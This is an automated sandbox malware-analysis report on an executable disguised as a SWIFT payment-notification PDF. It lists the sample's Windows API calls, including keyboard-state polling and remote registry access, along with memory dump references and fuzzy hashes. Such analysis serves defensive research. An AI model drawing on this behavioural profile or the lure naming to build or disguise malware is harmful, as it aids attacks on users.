                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharDriveLowerType
                                                                                                                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                              • API String ID: 2426244813-2127371420
                                                                                                                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                              APIs
                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                              • String ID: 2
                                                                                                                              • API String ID: 1331449709-450215437
                                                                                                                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                              • API String ID: 4072794657-2268648507
                                                                                                                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                              APIs
                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                              • API String ID: 3030280669-22481851
                                                                                                                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyWindow
                                                                                                                              • String ID: static
                                                                                                                              • API String ID: 3375834691-2160076837
                                                                                                                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                              APIs
                                                                                                                              • LoadIconW.USER32(00000000,00007F04), ref: 004342D1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoad
                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DriveType
                                                                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                              • API String ID: 2907320926-3566645568
                                                                                                                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                              • DeleteObject.GDI32(005F0000), ref: 00470A04
                                                                                                                              • DestroyIcon.USER32(00330030), ref: 00470A1C
                                                                                                                              • DeleteObject.GDI32(C0E6978E), ref: 00470A34
                                                                                                                              • DestroyWindow.USER32(004D004F), ref: 00470A4C
                                                                                                                              • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                              • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1237572874-0
                                                                                                                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                              APIs
                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706829360-0
                                                                                                                              • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                              • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                                                                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                              • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                              • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                              APIs
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Directory$CurrentSystem
                                                                                                                              • String ID: D
                                                                                                                              • API String ID: 1285235121-2746444292
                                                                                                                              • Opcode ID: ec2276bff139d193c8035f10e4f201858febb81f924d0aa365413a64b207cb19
                                                                                                                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                              • Opcode Fuzzy Hash: ec2276bff139d193c8035f10e4f201858febb81f924d0aa365413a64b207cb19
                                                                                                                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                              Strings
                                                                                                                              • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask
                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                              • API String ID: 3724026681-2785691316
                                                                                                                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
